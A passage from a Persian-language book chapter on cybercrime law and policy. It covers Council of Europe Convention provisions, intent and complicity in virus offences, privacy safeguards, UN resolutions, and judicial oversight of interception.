‫ﺟﻨﺎﻳﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ‪ ،‬ﻭ ﺩﺭ ﺍﻳـﻦ‬
‫ﺭﺍﺳﺘﺎ ﻗﺎﺋﻞ ﺷﺪﻥ ﺗﻔﺎﻭﺕ ﻣﻴﺎﻥ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺟﺮﺍﺋﻤﻲ ﻛـﻪ‬
‫ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﻨﺪﻫﺎﻱ ‪ ۷‬ﺗﺎ ‪ ۱۰‬ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺍﺯ ﺍﻳـﻦ ﻣﻔﻬـﻮﻡ ﻓﺎﺻـﻠﻪ‬
‫ﻣﻲﮔﻴﺮﺩ ﻭ ﺑﺼﻮﺭﺕ ﻛﻠﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻤﻲ ﺻـﺤﺒﺖ ﻣـﻲﻛﻨـﺪ‬
‫ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺴﻬﻴﻞ ﺍﻧﺠﺎﻡ ﺁﻧﭽﻪ ﻛﻪ ﺧـﺎﺭﺝ‬
‫ﺍﺯ ﻓﻀﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺟﺮﻡ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ ﻣـﻲﭘـﺮﺩﺍﺯﺩ )ﻛﺎﺭﻫـﺎﻳﻲ‬
‫ﭼﻮﻥ ﺟﻌﻞ‪ ،‬ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺗﻮﺯﻳﻊ‪ ،‬ﺗﻮﻟﻴﺪ ﻳﺎ ﺩﺍﺷﺘﻦ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ‬
‫ﻭ ﻧﻘﺾ ﺣﻘﻮﻕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﻳﻚ ﺍﺛﺮ(‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻲ ﻧﻈﺎﻣﻬﺎﻱ‬
‫ﺣﻘﻮﻗﻲ‪ ،‬ﺑﻜﺎﺭﮔﻴﺮﻱ ﺿﻮﺍﺑﻂ ﺧﺎﺹ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻤـﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ‬
‫ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺍﻳﻦ ﻗـﻮﺍﻧﻴﻦ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﻧـﻪﭼﻨـﺪﺍﻥ‬
‫‪Hypertext‬‬
‫‪84‬‬
‫ﻣﺘﻨﺎﺳﺐ‪ ،‬ﺟﺮﺍﺋ ﹺﻢ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺑـﺪﺗﺮ ﺍﺯ ﺟـﺮﺍﺋﻢ‬
‫ﻣﺸﺎﺑﻪ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺟﻠﻮﻩ ﺩﻫﻨﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﺩ ﻣﻔﺎﻫﻴﻢ ﭘﺎﻳﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺟﺰﺍ‬
‫ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻔﺎﻫﻴﻢ ﻣﻌﻤﻮﻝ ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ‬
‫ﻣﺎﻧﻨـﺪ "ﻣﻌﺎﻭﻧــﺖ ﺩﺭ ﺟــﺮﻡ" ﻳــﺎ "ﻗـﺼﺪ" ﺭﺍ ﻧﻴــﺰ ﺩﺭ ﺣــﻮﺯﺓ ﺟــﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻗـﺎﻧﻮﻥ‬
‫ﺟﺮﺍﺋﻢ ﻋﺎﺩﻱ ﻣﻔﻬﻮﻡ "ﻗﺼﺪ ﺗﺨﻠﻒ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ‪ ،‬ﺩﺭ‬
‫ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻫﻤﺎﻥ ﻣﻔﻬﻮﻡ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﻗﺼﺪ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺟﺮﻡ" ﻭ ﻳﺎ "ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﺟﺮﻡ" ﻣﻄـﺮﺡ‬
‫ﺷﻮﺩ؛ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﻳﺮﻭﺱ ﺑـﻪ ﺩﺭﺳـﺘﻲ ﻋﻤـﻞ ﻧﻜﻨـﺪ‪ .‬ﺑـﻪ‬
‫ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻔﻬﻮﻡ "ﻣﻌﺎﻭﻧـﺖ ﺩﺭ ﺟـﺮﻡ" ﺭﺍ‬
‫ﺗﻌﺮﻳﻒ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ‪ ،‬ﺩﺭ ﺣﻮﺯﻩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺯ‬
‫ﻼ ﺍﮔـﺮ ﻛـﺴﻲ‬
‫ﻫﻤﺎﻥ ﺗﻌﺎﺭﻳﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪ ،‬ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﺜ ﹰ‬
‫ﺑﺼﻮﺭﺕ ﻋﻤﺪﻱ ﻳﻚ ﻭﻳﺮﻭﺱ ﺗﻮﻟﻴﺪ ﻛﻨـﺪ‪ ،‬ﺣﺘـﻲ ﺍﮔـﺮ ﻭﻳـﺮﻭﺱ‬
‫ﺗﻮﺳﻂ ﺷﺨﺺ ﺩﻳﮕـﺮﻱ ﺑـﻪ ﺷـﺒﻜﻪ ﺭﺍﻩ ﻳﺎﻓﺘـﻪ ﺑﺎﺷـﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ‬
‫ﺷﺨﺺ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ ﺩﺭ ﻗﺒـﺎﻝ ﺧﺮﺍﺑﻴﻬـﺎﻳﻲ ﻛـﻪ ﺁﻥ ﻭﻳـﺮﻭﺱ ﺩﺭ‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﺎﻟﺒﹰﺎ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﺆﺍﻻﺗﻲ‬
‫ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﻭﻟﺖ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻧﻬـﺎ ﺣـﻖ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺜ ﹰ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘﻴـﺪﺍ‬
‫ﻣﻲﻛﻨﺪ ‪ -‬ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﻮﺍﻫﺪﻱ ﺑـﺮ ﺍﻧﺠـﺎﻡ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺗﺨﻠﻔﺎﺕ ﺑﺎﺷﻨﺪ ‪ -‬ﻛﺪﺍﻣﻨﺪ؟ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺩﻭﻟـﺖ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ‬
‫ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺳــﺘﻮﺭﺍﺕ ﻗــﻀﺎﻳﻲ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﺩﺍﺩﻩﻫــﺎﻱ‬
‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﻳﺎ ﺣﻜﻢ ﺗﺼﺮﻑ ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺍﺟـﺎﺯﻩ‬
‫ﺭﺩﻳــﺎﺑﻲ ﺑﻼﺩﺭﻧــﮓ‪ ٨٥‬ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ ﺍﻧﺘﻘــﺎﻟﻲ ﺭﺍ ‪ -‬ﻛــﻪ‬
‫ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ‪ -‬ﻣـﻲﺩﻫﻨـﺪ‪ .‬ﺑﺨـﺶ‬
‫ﻣﻬﻤﻲ ﺍﺯ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﺭﺩﻳـﺎﺑﻲ ﺍﺳـﻨﺎﺩ‬
‫‪Realtime Interception‬‬
‫‪85‬‬
‫‪٢٤٩‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﻭ ﮔﺰﺍﺭﺵ ﻫﺮ ﻧﻮﻉ ﺛﺒﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ‬
‫ﺩﻭﻟﺖ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﻃﺒﻖ ﻗﻄﻌﻨﺎﻣﺔ ‪ ۵۵/۶۳‬ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ )ﺩﺳﺎﻣﺒﺮ ‪ ،(۲۰۰۰‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ‬
‫ﻛﺸﻮﺭﻫﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺭﻭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺑﻪ ﺗﺼﻮﻳﺐ ﻣﻲﺭﺳﺎﻧﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺍﺯ ﺁﺯﺍﺩﻳﻬﺎﻱ ﻓـﺮﺩﻱ‬
‫ﻭ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻧﻴﺰ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﺁﻭﺭﻧـﺪ‪ .‬ﺩﺭ ﺳـﺎﻝ ‪۱۹۹۰‬‬
‫ﻫﺸﺘﻤﻴﻦ ﻛﻨﮕﺮﺓ ﺳﺎﺯﻣﺎﻥ ﻣﻠـﻞ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﻭ‬
‫ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻣﺘﺨﻠﻔـﻴﻦ‪ ،‬ﺩﺭ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ ﺍﺭﺯﻳـﺎﺑﻲ‪،‬‬
‫ﻗﻮﺍﻧﻴﻦ ﺭﻭﺷﻦ ﻭ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺩﺭ ﺷﻨﺎﺳـﺎﻳﻲ ﺟـﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﭘﻴــﺸﻨﻬﺎﺩﺍﺗﻲ ﺭﺍ ﻣﻄــﺮﺡ ﺳــﺎﺧﺖ‪ .‬ﺩﺭ ﺳــﺎﻝ ‪،۱۹۹۵‬‬
‫ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ ﺭﺍﻫﻨﻤﺎﻱ ﭘﻴﺸﮕﻴﺮﻱ ﻭ ﻛﻨﺘـﺮﻝ ﺟـﺮﺍﺋﻢ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬
‫ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪ‪ .‬ﺍﻳﻦ ﺳﻨﺪ ﻣﻔﺼﻞ ﻃﻴـﻒ ﮔـﺴﺘﺮﺩﻩﺍﻱ ﺍﺯ‬
‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺟﺮﺍﺋﻢ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﻃﺮﺡ ﻛﺮﺩﻩ ﺑﻮﺩ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻗﻮﺍﻧﻴﻦ ﺭﻭﺍﻝﻣﻨﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﻮﺿـﻮﻋﻪ‪ ،‬ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺍﻣﻨﻴﺖ‪ ،‬ﻭ ﻧﻴﺰ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪.‬‬
‫‪.۱‬‬
‫ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨـﺪ ﻛـﻪ ﺑـﻪ ﺗـﺪﻭﻳﻦ‪،‬‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﺩﺭ ﺿـﻮﺍﺑﻂ ﻭ ﻗـﻮﺍﻧﻴﻦ‬
‫ﻣﺤﻠﻲ ‪ -‬ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇـﺖ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺣﻘـﻮﻕ ﻭ‬
‫ﺁﺯﺍﺩﻳﻬﺎﻱ ﺑﺸﺮ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﺣﻘﻮﻕ ﻣﺬﻛﻮﺭ ﺩﺭ ﻣﻘـﺮﺭﺍﺕ ﺳـﺎﻝ‬
‫‪ ۱۹۵۰‬ﻛﻨﻮﺍﻧﺴﻴﻮﻥ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﻘﻮﻕ ﺑـﺸﺮ‪،‬‬
‫ﺁﺯﺍﺩﻳﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺣﻘﻮﻕ ﺑﺸﺮ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ‪ -‬ﺗﻮﺟﻪ ﻻﺯﻡ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪.۲‬‬
‫ﺍﻳﻦ ﺿﻮﺍﺑﻂ ﺑﺎﻳﺪ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﻃﺒﻴﻌﺖ ﺁﻧﻬﺎ ﺍﻳﺠـﺎﺏ‬
‫ﻣﻲﻛﻨﺪ ﻧﻈﺎﺭﺗﻬﺎﻱ ﻗﻀﺎﻳﻲ ﻭ ﺳﺎﻳﺮ ﻧﻈﺎﺭﺗﻬـﺎﻱ ﻣـﺴﺘﻘﻞ ﺭﺍ‬
‫ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﻧﺪ‪ ،‬ﺑﺎﻋﺚ ﺗﻨﻈـﻴﻢ ﻛﺎﺭﺑﺮﺩﻫـﺎ ﺷـﻮﻧﺪ‪ ،‬ﻭ ﺍﺳـﺒﺎﺏ‬
‫ﻛﺎﻫﺶ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﺍﻣﻨﻪﺍﻱ ﻭ ﺯﻣﺎﻧﻲ ﺭﻭﺍﻟﻬﺎ ﺭﺍ ﻓـﺮﺍﻫﻢ‬
‫ﺁﻭﺭﻧﺪ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻧﻈﺎﺭﺕ‬
‫ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺭﻭﺍﻟﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺧﺎﺻـﻲ ﻛـﻪ ﻣـﺮﺗﺒﻂ ﺑـﺎ‬
‫ﻣﻨﺸﻮﺭ ﺣﻘﻮﻕ ﺑﺸﺮ ﺍﺭﻭﭘﺎ ﺑﺎﺷﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﺳـﺎﺯﺩ‪ ،‬ﺑﻠﻜـﻪ ﺩﺭ‬
‫ﻼ ﺧﻼﺻﻪ ﺷﺪﻩ‬
‫ﺗﺼﻤﻴﻤﺎﺕ ﺩﺍﺩﮔﺎﻩ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘﻮﻕ ﺑﺸﺮ )ﻛﻪ ﺫﻳ ﹰ‬
‫ﺍﺳﺖ( ﻗـﻮﺍﻧﻴﻦ ﻧﻈـﺎﺭﺕ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻫﻤﭽـﻮﻥ ﻛﺎﻧـﺎﺩﺍ ﻭ ﺍﻳـﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ‪ -‬ﻛﻪ ﺭﻭﺍﻟﻬﺎﻱ ﻗﻮﻱ ﻭ ﻣﺴﺘﻘﻞ ﺩﺭ ﻗﻀﺎﻭﺕ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺍﺭﻧـﺪ ‪ -‬ﺩﻳـﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﺟﻮﺍﻣـﻊ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻗـﻮﺍﻧﻴﻦ ﻣـﺸﺨﺺ ﻭ ﺗﻌﺮﻳـﻒ‬
‫ﺷﺪﻩﺍﻱ ﺩﺭ ﻣﻮﺭﺩ ﺗﺤﻘﻴﻖ‪ ،‬ﺗﺼﺮﻑ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ‪ ،‬ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﻪﻫــﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﺗﻮﺳﻌﺔ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗﻮﻱ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟـﺖ‬
‫ﺗﻮﺟﻪ ﺟﺪﻱ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻈﺎﻣﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺣﻘﻮﻗﻲ ﺩﻧﻴﺎ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺠﺎﺯ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺗﺤﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﻭﺷﻦ ﻗﺎﻧﻮﻧﻲ؛‬
‫ﻭ ﺍﻟﺒﺘﻪ ﺑﺎﺯ ﻫﻢ ﺑﺮﺍﻱ ﺁﻥ ﺑﻪ ﺩﻻﻳﻞ ﻛﺎﻓﻲ ﻧﻴﺎﺯ ﺍﺳﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣـﺮ‬
‫ﻻ ﺑﻪ ﻣﻌﻨﺎﻱ ﺗﺼﺪﻳﻖ ﻗﺎﺿﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻭﻟﺘﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﺒﺎﺣﺚ ﺭﺩﻳﺎﺑﻲ ﻭ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺩﻩﻫﺎ ﻣﻲﭘﺮﺩﺍﺯﻧـﺪ‬
‫ﺑﺎﻳﺪ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺩﺳﺘﺮﺳﻲ ﺩﻭﻟـﺖ ﺑـﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ‬
‫‪Charter of Fundamental Rights of the EU‬‬
‫‪86‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﮔﺰﺍﺭﺷﮕﻴﺮﻱ ﺍﺟﺒﺎﺭﻱ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ‬
‫ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺗﻮﺳـﻂ ﺩﻭﻟـﺖ ﻣﻨﺠـﺮ ﺑـﻪ‬
‫ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺤــﺎﻓﻈﺘﻲ ﺑــﻴﺶ ﺍﺯ ﭘــﻴﺶ ﺍﺣــﺴﺎﺱ ﻣــﻲﮔــﺮﺩﺩ‪.‬‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ‪ OECD‬ﺩﺭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴـﺖ‬
‫ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨـﺪ‪" :‬ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺍﺭﺯﺷﻬﺎﻱ‬
‫ﻣﺸﺨﺺﺷـﺪﻩ ﺍﺯ ﻃـﺮﻑ ﺟﻮﺍﻣـﻊ ﺩﻣﻮﻛﺮﺍﺗﻴـﻚ ﺍﺯ ﺟﻤﻠـﻪ ﺁﺯﺍﺩﻱ‬
‫ﺗﺒﺎﺩﻝ ﺍﻓﻜﺎﺭ ﻭ ﺍﻳﺪﻩﻫﺎ‪ ،‬ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻮﺩﻥ‬
